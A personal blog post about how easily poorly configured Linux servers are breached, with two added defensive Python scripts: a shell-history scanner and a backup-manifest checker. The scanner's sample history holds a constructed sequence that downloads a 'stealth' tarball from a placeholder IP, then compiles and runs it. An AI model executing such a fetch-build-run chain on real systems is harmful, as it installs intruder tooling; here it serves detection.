element14 Community
Personal Blogs

Author: luigimorelli
Date Created: 7 Nov 2019 10:28 AM
1214 views, 3 likes, 7 comments
Tags: security, it

Security and ease

Nowadays, breaching the security of a system has become quite easy.

Today a colleague of mine from the IT security staff paid me a visit. He asked whether I could take a look at a C program, and I obviously accepted; great was my astonishment when I realized that the "innocent code" was nothing less than a "stealth" tool allowing an attacker to enter a Linux system, take over the root credentials and hide his actions. Still, something about it was not clear: the code was extremely well commented and tidy, apparently written for didactic purposes only. "Who gave you this program?" I suddenly asked my friend. He blushed and admitted: "I isolated it on a badly behaving server, and now I understand why. Reading the command history I noticed that a user logged in as root, downloaded (and compiled!) the malware and ran it: after that he could log in in stealth mode and do whatever he wanted. Fortunately, he only tried a few commands."

The intruder was a script kiddie after all, and left clues of his actions everywhere; he even left his source code in his working directory. Still, the risk inherent in such situations is fairly high, and higher still when the server faces the Internet with all its default configuration options, disregarding the basics of IT security.
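
The intruder above was found by reading the root shell's command history for a download, a compile and a run of the result. As an added example (not code from the post, nor from the malware it describes), the script below automates that review: it scans history lines for the download -> compile -> execute chain and reports the three lines involved, while ignoring a local build that has no download in front of it. The history lines, file names, the `window` parameter and the TEST-NET address 198.51.100.23 are all constructed for the example.

```python
import os
import re
from dataclasses import dataclass
from typing import Dict, List, Optional

# Constructed sample of a root shell history (not taken from the server in
# the post). 198.51.100.23 is from a documentation range (TEST-NET-2).
SUSPICIOUS_HISTORY = """\
apt update
wget http://198.51.100.23/tools/stealth.tar.gz
tar xzf stealth.tar.gz
cd stealth
gcc -O2 -o stealth stealth.c
./stealth install
ls -la /etc/ssh
exit
"""

# A build-and-run sequence with no download in front of it: an admin
# compiling a local tool. It must not be reported.
BENIGN_HISTORY = """\
cd ~/src/hello
gcc -o hello hello.c
./hello
"""

DOWNLOAD_RE = re.compile(r"^(?:sudo\s+)?(?:wget|curl|git\s+clone|scp|ftp|tftp)\b")
COMPILE_RE = re.compile(r"^(?:sudo\s+)?(gcc|cc|clang|tcc|make)\b")
OUTPUT_RE = re.compile(r"(?:^|\s)-o\s+(\S+)")      # explicit output name
EXEC_RE = re.compile(r"^(?:sudo\s+)?(\.?/\S+)")    # ./name or /abs/path/name


@dataclass(frozen=True)
class Finding:
    download_line: int   # zero-based index into the history
    compile_line: int
    run_line: int
    artefact: str        # basename of the binary that was run


def find_build_and_run_chains(history: str, window: int = 20) -> List[Finding]:
    """Report every compiled binary that is executed within `window` history
    lines of a download. download -> compile -> run is the pattern the post
    describes; a local build with no preceding download does not match."""
    findings: List[Finding] = []
    last_download: Optional[int] = None
    built: Dict[str, int] = {}   # artefact basename -> index of compile line
    for i, raw in enumerate(history.splitlines()):
        cmd = raw.strip()
        if DOWNLOAD_RE.match(cmd):
            last_download = i
            continue
        m = COMPILE_RE.match(cmd)
        if m:
            out = OUTPUT_RE.search(cmd)
            if out:
                name = os.path.basename(out.group(1))
            elif m.group(1) == "make":
                name = "*"        # make: output name unknown, any ./X counts
            else:
                name = "a.out"    # compiler default output name
            built[name] = i
            continue
        run = EXEC_RE.match(cmd)
        if run:
            name = os.path.basename(run.group(1))
            compile_line = built.get(name, built.get("*"))
            if (compile_line is not None and last_download is not None
                    and i - last_download <= window):
                findings.append(Finding(last_download, compile_line, i, name))
    return findings


if __name__ == "__main__":
    for label, hist in (("suspicious", SUSPICIOUS_HISTORY), ("benign", BENIGN_HISTORY)):
        chains = find_build_and_run_chains(hist)
        lines = hist.splitlines()
        print(f"{label}: {len(chains)} chain(s)")
        for f in chains:
            print(f"  download: {lines[f.download_line]}")
            print(f"  compile:  {lines[f.compile_line]}")
            print(f"  run:      {lines[f.run_line]}")
```

The check is deliberately narrow: a history only records what an interactive shell saw, so a script, a cron job or a history file the intruder deleted leaves nothing for it to find; treat a hit as a reason to look at the box, and a miss as no evidence either way.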

Among other things, the code contained a link to a peculiar IP address, a sort of "signature"; on reflection I could easily show that the link opened a true "wonder shop", a real arsenal of utilities and documentation related to hacking and cracking.

The big stroke of luck here is that the majority of script kiddies are so overwhelmed by how easy it is to break into other people's computers that they do not even read the manuals, caveats or other documentation needed to do a clean job.

There is a practice of passing on the installation and usage instructions for those programs by word of mouth: this custom makes the security manager's job much easier.

I was told a nice anecdote about it. We are in the CS lab of a big university, and a student (a freshman or a sophomore) calls the tutor, complaining that "the C compiler does not work". The tutor approaches the PC, glances at the code, and sees something that catches his attention. The code that "did not compile" was supposed to spawn a shell giving the user the ability to run any program on the server with maximum privileges. Obviously the student did not have the skills to operate such code, and the university had other security systems to block such malicious behaviour. What I want to underline here is how easy and uncontrolled the path to accessing private data sometimes is.

Security does not mean complacency about the inviolability of our data and the inaccessibility of our machines. Security means knowledge of the risks, and continuous auditing.

It is useless to implement a data backup routine when nobody checks it routinely (the risk here is losing the older backups by overwriting them with data corrupted after an attack); but complacency about the state of a system whose security has been tested once is useless as well, because new intrusion techniques that take advantage of software bugs or weaknesses are continuously developed.
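
The paragraph above says that a backup nobody checks is worthless, and that the real danger is rotating a good old copy away in favour of a bad new one. The following is an added example, not part of the original post: a backup check that records a SHA-256 manifest when the snapshot is taken, re-verifies the snapshot before it is allowed to replace an older one, and reports files that were modified, deleted or added in between. The directory layout and file names are constructed for the demonstration; the one assumption that matters is that the manifest is kept somewhere the backup job (and anyone who can write to the backup target) cannot overwrite.

```python
import hashlib
import tempfile
from pathlib import Path
from typing import Dict, List


def sha256_file(path: Path) -> str:
    """Stream a file through SHA-256 so large backups are not read into memory."""
    digest = hashlib.sha256()
    with path.open("rb") as fh:
        for chunk in iter(lambda: fh.read(1 << 16), b""):
            digest.update(chunk)
    return digest.hexdigest()


def build_manifest(root: Path) -> Dict[str, str]:
    """Relative POSIX path -> SHA-256 for every regular file under `root`.
    Record this when the backup is taken and store it outside the backup
    tree, where the backup job cannot overwrite it."""
    return {
        p.relative_to(root).as_posix(): sha256_file(p)
        for p in sorted(root.rglob("*"))
        if p.is_file()
    }


def verify_backup(root: Path, manifest: Dict[str, str]) -> Dict[str, List[str]]:
    """Compare the backup tree as it is now against the manifest recorded
    when it was made. Every non-empty list is a reason not to trust it."""
    current = build_manifest(root)
    return {
        "missing": sorted(set(manifest) - set(current)),
        "unexpected": sorted(set(current) - set(manifest)),
        "modified": sorted(
            name for name in manifest.keys() & current.keys()
            if manifest[name] != current[name]
        ),
    }


def safe_to_rotate(root: Path, manifest: Dict[str, str]) -> bool:
    """Gate for the rotation step: the newest snapshot may overwrite an older
    one only if it still matches its manifest."""
    return not any(verify_backup(root, manifest).values())


def demo() -> dict:
    """Constructed scenario (hypothetical file names): take a clean snapshot,
    record its manifest, then alter the snapshot the way a faulty job or an
    intruder would, and watch the rotation gate close."""
    with tempfile.TemporaryDirectory() as tmp:
        snapshot = Path(tmp) / "snapshot"
        (snapshot / "db").mkdir(parents=True)
        (snapshot / "db" / "customers.csv").write_text("id,name\n1,Alice\n")
        (snapshot / "db" / "orders.csv").write_text("id,total\n1,42\n")
        (snapshot / "config.ini").write_text("[app]\nmode=prod\n")

        manifest = build_manifest(snapshot)          # recorded at backup time
        clean_before = safe_to_rotate(snapshot, manifest)

        # Changes made after the manifest was recorded: one file altered,
        # one deleted, one that was never part of the backup.
        (snapshot / "db" / "customers.csv").write_text("id,name\n1,Mallory\n")
        (snapshot / "db" / "orders.csv").unlink()
        (snapshot / "tmp.bin").write_bytes(b"\x00" * 16)

        return {
            "clean_before": clean_before,
            "report": verify_backup(snapshot, manifest),
            "rotate_after": safe_to_rotate(snapshot, manifest),
        }


if __name__ == "__main__":
    result = demo()
    print("clean before tampering:", result["clean_before"])
    for kind, names in result["report"].items():
        print(f"{kind}: {names}")
    print("rotation allowed now:", result["rotate_after"])
```

A manifest check proves the backup still is what it was when taken; it says nothing about whether the data was already corrupted at that moment, which is why the post also insists on a periodic restore test rather than a one-off one.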

Post scriptum

Bruce Schneier used to repeat that there are only two classes of encryption systems: those that keep your data hidden from your five-year-old sister, and those that protect your privacy against governments. The latest news about WikiLeaks and the NSA makes clear which class is most used today.

Sure enough, encryption is not everything: we have digital signature systems, electronic certificates, procedures and processes tightly connected to corporate security, technological infrastructures, abstraction layers… and Post-it notes.

In such cases, the level of security equals that of its weakest link: it is not so rare to meet users who stick visible yellow Post-it notes next to their PCs to "remember" the passwords for the successive layers of security, or managers who forget to monitor the corporate telephone lines through which any potential hacker with a laptop and a modem could get inside the corporate intranet.

It is well known that breaches of sensitive data are mostly due to corporate staff; still, far from justifying a lowering of the defences, such behaviour should lead to rethinking not just the technical infrastructure but also the control procedures. And here we come again to face bureaucracy: the procedures for evaluating data management risks inside a corporation are gathered in the ISO 27000 family of standards; to obtain certification (against ISO 27001, the certifiable standard of that family), the corporation must face a long series of structural, environmental, regulatory, behavioural, legal and procedural changes, and agree to periodic and sample checks on the application of the standard. This means a huge expense, to be considered a long-term investment, because the procedures go as far as specifying the forms to be used for handing over the security policies should the security manager leave.

Even if economically and logistically heavy, such a method should be seen positively, in anticipation of better enterprise security, but then… What happens when an ISO 9000 certified corporation fails a sample check? Easy: it is reprimanded by the certification body and forced to realign within the following three months, or it loses the certification. A well-thought-out process in the case of ISO 9000, but a disaster in the case of ISO 27000: a bad mark on a sample check would simply announce that "corporation XYZ is not aligned with the security policies: please feel free to attack it in any way you know". Or the corporation simply hides the bad marks during the check while waiting to rebalance its security. Here is the confirmation that the standards have an exquisitely bureaucratic meaning, and give nothing from the standpoint of corporate security when they are violated.

Top Comments

  • colporteur over 5 years ago +2
    Can you clarify your post, so I might gain a modicum of understanding? As a former IT security specialist, I am drawn to security articles like a moth is drawn to a flame. Your introduction containing…
  • luigimorelli over 5 years ago in reply to colporteur +1
    Sure, thank you for your interest. The post is part of an e-publication titled "Fenomenology of the Programmer" (written in Italian). Each chapter was in part a description of something that really…
  • colporteur over 5 years ago in reply to clem57

    I rather enjoyed the resource. How much I will retain is the question. I never had a desire to be a programmer. I would like to improve the skills that I have accumulated but not to the point I could call myself a programmer. I will cut the ties that bind me to the "Fenomenology of the Programmer". The post triggered a false positive.

    Sean

  • clem57 over 5 years ago in reply to luigimorelli (+2)

    Is this what we are talking about: (embedded YouTube video)

    Just trying to clear the air luigimorelli ...

  • neilk over 5 years ago

    I didn't really understand any of this.

    I was drawn to read it because of its title - "Moreware - Mindware site for Raspberry and Arduino prototyping"

    What was the relevance of this title?

    Neil

  • colporteur over 5 years ago in reply to luigimorelli (+1)

    When I need a refresher on programmers I pull out Mythical Man Month by Fred Brooks. Not much has changed. Give a programmer a well-defined set of requirements and 9/10 chances they provide code that meets requirements. Give a programmer a wish list and you get the programmer's book of dreams. I have often wondered what Stephen King's bad dreams are like, considering what he writes when he is not dreaming.

    Security requirements for coding need to be built in and not bolted on. OpenBSD is an example of an O/S with built-in security and MS Windows products are an example of bolt-on security. The bolt-on security is typically where you encounter problems.

    Your post was a squirrel that caught my attention. I will back away from the discussion, it is too esoteric for me.

    Sean

  • shabaz over 5 years ago (+1)

    I couldn't understand any of this article : (

    I really wanted to. Is there any simpler/shorter explanation? If it has been auto-translated, this may explain it, because the sentences are a bit confusing.
